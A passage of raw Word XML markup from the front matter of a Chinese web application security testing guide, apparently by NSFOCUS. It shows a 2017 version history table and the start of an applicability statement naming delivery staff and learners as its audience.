            <w:r w:rsidR="00FC2B56" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FC2B56" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>版本变更记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w14:paraId="71620FF5" w14:textId="77777777" w:rsidTr="0061580D">
        <w:trPr>
          <w:trHeight w:val="430"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35976859" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8AEAB0" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485A18EF" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="437B6F1A" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>修改人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w14:paraId="1022746F" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0B3033" w14:textId="2281AB09" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidR="009545F1" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidR="009545F1" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A44FAA7" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="00FC2B56"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V1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4350C89C" w14:textId="32AD78EC" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="0072384D" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文档创建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2CF0E7" w14:textId="3C7086B7" w:rsidR="00FC2B56" w:rsidRPr="00B505CE" w:rsidRDefault="0061580D"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业务标准化小组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C47F0F" w:rsidRPr="00F757E4" w14:paraId="3FF9B64D" w14:textId="77777777" w:rsidTr="00220D7C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F0D4A47" w14:textId="66B1EC6A" w:rsidR="00C47F0F" w:rsidRPr="00B505CE" w:rsidRDefault="00C47F0F" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BE76A32" w14:textId="430DA316" w:rsidR="00C47F0F" w:rsidRPr="00B505CE" w:rsidRDefault="00C47F0F"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V1.</w:t>
            </w:r>
            <w:r w:rsidR="00066399" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00804B73" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77E1E949" w14:textId="2748099C" w:rsidR="00C47F0F" w:rsidRPr="00B505CE" w:rsidRDefault="00066399"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新增内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30BF8FBB" w14:textId="17298FC9" w:rsidR="00C47F0F" w:rsidRPr="00B505CE" w:rsidRDefault="00C47F0F"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业务标准化小组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00804B73" w:rsidRPr="00F757E4" w14:paraId="1F362DDD" w14:textId="77777777" w:rsidTr="00B243D2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69D378BE" w14:textId="3E38ADB9" w:rsidR="00804B73" w:rsidRPr="00B505CE" w:rsidRDefault="00804B73" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2017</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>日</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CC09E1" w14:textId="7D3649F2" w:rsidR="00804B73" w:rsidRPr="00B505CE" w:rsidRDefault="00804B73"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V1.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EA3FC6A" w14:textId="1CA30F38" w:rsidR="00804B73" w:rsidRPr="00B505CE" w:rsidRDefault="00804B73"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新增内容</w:t>
            </w:r>
            <w:r w:rsidR="00390C68" w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>、调整格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54175C21" w14:textId="59E195B2" w:rsidR="00804B73" w:rsidRPr="00B505CE" w:rsidRDefault="00804B73" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B505CE">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>业务标准化小组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00804B73" w:rsidRPr="00F757E4" w14:paraId="3C8491B7" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C8A42E2" w14:textId="29024A4E"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156" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F34E2DE" w14:textId="6DEC9AFA"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0AF047C7" w14:textId="30F3A5FD"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3EFE4AB3" w14:textId="5A2F6C99"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75112EF8" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44D6E768" w14:textId="57E951F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156" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03785707" w14:textId="2CF9B949"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3AAF5DA4" w14:textId="0345EF7A"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74A83BF5" w14:textId="2D00D98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5D5A2454" w14:textId="77777777" w:rsidTr="00E15DBE">
        <w:trPr>
          <w:trHeight w:val="446"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F43E1CC" w14:textId="5417E1F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r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A3A12C5" w14:textId="5F44C5BC"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00EEEA3C" w14:textId="02FA817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689CAB07" w14:textId="14A5474B"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3363504A" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66308853" w14:textId="460C4D1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r w:rsidRPr="00F757E4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEAC1E0" w14:textId="6C629689"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3F1C9387" w14:textId="35F7EAE1"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46548446" w14:textId="23ACC46A"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7C38D29D" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040BFF14"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156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B454DB9"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0CC39989"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46E5E2C1"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bl>
    <w:p w14:paraId="2AF4BC56"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09E9E6E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FC2B56" w:rsidRPr="00F757E4" w14:paraId="29889139" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4C7745" w14:textId="77777777" w:rsidR="00FC2B56" w:rsidRPr="00EC0AD2" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">■ </w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>适用性声明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC2B56" w:rsidRPr="00F757E4" w14:paraId="38B06B74" w14:textId="77777777" w:rsidTr="00E44BB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7737F49F" w14:textId="00C1CDDE" w:rsidR="00FC2B56" w:rsidRPr="00EC0AD2" w:rsidRDefault="00FC2B56" w:rsidP="00106665">
            <w:pPr>
              <w:widowControl/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:adjustRightInd/>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:leftChars="50" w:left="105" w:right="105" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>本文档为北京神州绿盟科技有限公司（以下简称</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>绿盟科技</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidR="00F951A9" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>安全测试服务标准化小组</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>提供的</w:t>
            </w:r>
            <w:r w:rsidR="00F329DC" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidR="00F329DC" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>应用安全</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidR="00F951A9" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指南</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，适用于</w:t>
            </w:r>
            <w:r w:rsidR="002A130F" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>实施交付人员</w:t>
            </w:r>
            <w:r w:rsidR="006D35AD" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，并</w:t>
            </w:r>
            <w:r w:rsidR="00761DCD" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用</w:t>
            </w:r>
            <w:r w:rsidR="006D35AD" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>于</w:t>
            </w:r>
            <w:r w:rsidR="00F054AA" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>学习</w:t>
            </w:r>
            <w:r w:rsidR="00F054AA" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidR="00F054AA" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>应用安全测试</w:t>
            </w:r>
            <w:r w:rsidR="006D35AD" w:rsidRPr="00EC0AD2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:snapToGrid/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>时的参考资料</w:t>
            </w:r>
            <w:r w:rsidRPr="00EC0AD2">
              <w:rPr>
